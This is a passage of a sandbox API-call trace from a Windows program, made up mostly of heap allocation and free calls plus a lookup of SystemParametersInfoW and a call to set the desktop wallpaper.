dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0260.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0260.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0260.058] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0260.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0260.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0260.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0260.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0260.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0260.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0260.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0260.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0260.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0260.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0260.063] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0260.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0260.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0260.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7100 [0260.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0260.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0260.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0260.064] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0260.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0260.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0260.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0260.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0260.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0260.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0260.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0260.065] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0260.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0260.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0260.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0260.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0260.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0260.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0260.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0260.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0260.227] FreeLibrary (hLibModule=0x76240000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0260.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 